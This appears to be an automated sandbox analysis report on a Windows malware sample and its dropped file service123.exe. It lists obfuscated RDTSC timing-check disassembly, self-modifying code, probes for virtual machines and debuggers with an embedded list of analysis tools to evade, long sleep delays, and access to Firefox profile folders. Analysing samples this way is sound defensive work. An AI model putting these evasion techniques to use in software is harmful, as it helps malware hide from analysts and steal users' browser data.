Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 709094E second address: 70909A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F3E51171E72h 0x00000012 pushfd 0x00000013 jmp 00007F3E51171E72h 0x00000018 jmp 00007F3E51171E75h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70909A5 second address: 7090A13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 push ebx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F3E511046ABh 0x00000013 sbb esi, 285D292Eh 0x00000019 jmp 00007F3E511046B9h 0x0000001e popfd 0x0000001f mov ch, 9Fh 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 movzx esi, bx 0x0000002a pushfd 0x0000002b jmp 00007F3E511046B1h 0x00000030 add cx, B816h 0x00000035 jmp 00007F3E511046B1h 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7070D8B second address: 7070D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7070D90 second address: 7070E0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edi 0x00000005 pushfd 0x00000006 jmp 00007F3E511046AEh 0x0000000b or ax, 26C8h 0x00000010 jmp 00007F3E511046ABh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b push ebx 0x0000001c push esi 0x0000001d pop edx 0x0000001e pop esi 0x0000001f push ebx 0x00000020 push esi 0x00000021 pop edx 0x00000022 pop esi 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 jmp 00007F3E511046B5h 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F3E511046ACh 0x00000033 xor cx, DB88h 0x00000038 jmp 00007F3E511046ABh 0x0000003d popfd 0x0000003e push eax 0x0000003f push edi 0x00000040 pop esi 0x00000041 pop edx 0x00000042 popad 0x00000043 pop ebp 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 mov bx, 4FCEh 0x0000004b mov bl, 9Ah 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7080537 second address: 708055C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F3E51171E6Eh 0x0000000a or si, 41D8h 0x0000000f jmp 00007F3E51171E6Bh 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 708055C second address: 7080599 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F3E511046AEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3E511046AEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7080599 second address: 708059F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 708059F second address: 70805A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70805A3 second address: 70805C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3E51171E74h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70805C2 second address: 70805D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70805D9 second address: 70805DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70805DD second address: 70805E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70805E3 second address: 7080629 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 pushfd 0x00000007 jmp 00007F3E51171E75h 0x0000000c sub si, 2846h 0x00000011 jmp 00007F3E51171E71h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F3E51171E6Dh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7080629 second address: 7080666 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3E511046B7h 0x00000009 and ecx, 2F2D242Eh 0x0000000f jmp 00007F3E511046B9h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7080666 second address: 70806BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F3E51171E77h 0x0000000d xchg eax, ebx 0x0000000e jmp 00007F3E51171E76h 0x00000013 xchg eax, esi 0x00000014 jmp 00007F3E51171E70h 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F3E51171E6Eh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70806BE second address: 70806F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 6114h 0x00000007 mov ecx, edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, esi 0x0000000d jmp 00007F3E511046AFh 0x00000012 mov esi, dword ptr [ebp+08h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F3E511046B0h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70806F1 second address: 7080700 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7080700 second address: 7080705 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7080705 second address: 708073F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ecx, 00000000h 0x0000000c jmp 00007F3E51171E6Ch 0x00000011 xchg eax, edi 0x00000012 jmp 00007F3E51171E70h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F3E51171E6Eh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 708073F second address: 7080751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3E511046AEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7080751 second address: 708075E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 pushad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 708075E second address: 708077B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 mov eax, 00000001h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3E511046ADh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 708077B second address: 70807CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [esi], ecx 0x0000000d jmp 00007F3E51171E6Eh 0x00000012 mov ecx, eax 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F3E51171E6Eh 0x0000001b xor cx, 67D8h 0x00000020 jmp 00007F3E51171E6Bh 0x00000025 popfd 0x00000026 push eax 0x00000027 push edx 0x00000028 mov di, si 0x0000002b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70807CA second address: 70807FA instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 cmp ecx, 01h 0x0000000a jmp 00007F3E511046ACh 0x0000000f jne 00007F3EC13D6494h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007F3E511046ADh 0x0000001d mov dx, ax 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70807FA second address: 7080800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7080800 second address: 7080804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7080804 second address: 7080820 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7080820 second address: 708083B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 708083B second address: 708085B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 4741h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3E51171E73h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 708085B second address: 708089E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 39A8547Ah 0x00000008 mov esi, edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 call 00007F3E511046B5h 0x0000001a jmp 00007F3E511046B0h 0x0000001f pop esi 0x00000020 popad 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 708089E second address: 70808B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70808B8 second address: 70808BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70808BE second address: 70808C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7040AAB second address: 7040ABE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 mov al, 70h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov eax, 7AC2BCB1h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7040ABE second address: 7040AC9 instructions: 0x00000000 rdtsc 0x00000002 mov si, 72EDh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7040AC9 second address: 7040B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, 4B9712A5h 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f call 00007F3E511046AEh 0x00000014 pushfd 0x00000015 jmp 00007F3E511046B2h 0x0000001a add ch, FFFFFFE8h 0x0000001d jmp 00007F3E511046ABh 0x00000022 popfd 0x00000023 pop ecx 0x00000024 movsx edi, cx 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a pushad 0x0000002b mov eax, 366E54ADh 0x00000030 mov si, 8EA9h 0x00000034 popad 0x00000035 xchg eax, ecx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F3E511046ABh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7040B28 second address: 7040B2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7040B2D second address: 7040C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F3E511046B5h 0x0000000a adc ecx, 04954C66h 0x00000010 jmp 00007F3E511046B1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007F3E511046B1h 0x0000001f xchg eax, ecx 0x00000020 pushad 0x00000021 call 00007F3E511046ACh 0x00000026 pushfd 0x00000027 jmp 00007F3E511046B2h 0x0000002c sub ax, 4E68h 0x00000031 jmp 00007F3E511046ABh 0x00000036 popfd 0x00000037 pop eax 0x00000038 push edx 0x00000039 pushfd 0x0000003a jmp 00007F3E511046B4h 0x0000003f add cl, FFFFFFC8h 0x00000042 jmp 00007F3E511046ABh 0x00000047 popfd 0x00000048 pop eax 0x00000049 popad 0x0000004a push 00000000h 0x0000004c pushad 0x0000004d pushfd 0x0000004e jmp 00007F3E511046B5h 0x00000053 add ax, 11E6h 0x00000058 jmp 00007F3E511046B1h 0x0000005d popfd 0x0000005e call 00007F3E511046B0h 0x00000063 mov ch, 8Bh 0x00000065 pop ebx 0x00000066 popad 0x00000067 push 00000000h 0x00000069 pushad 0x0000006a mov si, 09FFh 0x0000006e push eax 0x0000006f push edx 0x00000070 mov dx, ax 0x00000073 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7040C9B second address: 7040CB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Special instruction interceptor: First address: 153F9C0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Special instruction interceptor: First address: 16D2879 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Special instruction interceptor: First address: 153D47A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Special instruction interceptor: First address: 16D9FEE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Special instruction interceptor: First address: 1756F19 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Window / User API: threadDelayed 1345 Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Window / User API: threadDelayed 804 Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Window / User API: threadDelayed 872 Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Window / User API: threadDelayed 882 Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Window / User API: threadDelayed 969 Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Window / User API: threadDelayed 1429 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 1894 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 8105 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.0 %
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 3108 Thread sleep time: -54027s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 6292 Thread sleep count: 1345 > 30 Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 6292 Thread sleep time: -2691345s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 2196 Thread sleep count: 804 > 30 Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 2196 Thread sleep time: -1608804s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 6060 Thread sleep count: 872 > 30 Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 6060 Thread sleep time: -1744872s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 4488 Thread sleep count: 882 > 30 Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 4488 Thread sleep time: -1764882s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 5980 Thread sleep count: 969 > 30 Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 5980 Thread sleep time: -1938969s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 6292 Thread sleep count: 1429 > 30 Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 6292 Thread sleep time: -2859429s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 6508 Thread sleep count: 1894 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 6508 Thread sleep time: -189400s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 6508 Thread sleep count: 8105 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 6508 Thread sleep time: -810500s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomed\ Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\0absryc3.default\ Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\ Jump to behavior
Source: Amcache.hve.12.dr Binary or memory string: VMware
Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.12.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.12.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.12.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.12.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.12.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.12.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Amcache.hve.12.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Amcache.hve.12.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.12.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: chrome.exe, 00000004.00000002.2802480588.0000029ACA3DB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.12.dr Binary or memory string: vmci.sys
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Amcache.hve.12.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.12.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.12.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.dr Binary or memory string: VMware20,1
Source: Amcache.hve.12.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.12.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.12.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.12.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.12.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.12.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.12.dr Binary or memory string: VMware VMCI Bus Device
Source: PhwUGyok2i.exe, 00000000.00000003.2398744722.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.12.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.12.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\PhwUGyok2i.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: NTICE
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: SICE
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: SIWVID
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00168230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 7_2_00168230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_0016116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 7_2_0016116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00161160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 7_2_00161160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_001611A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 7_2_001611A3
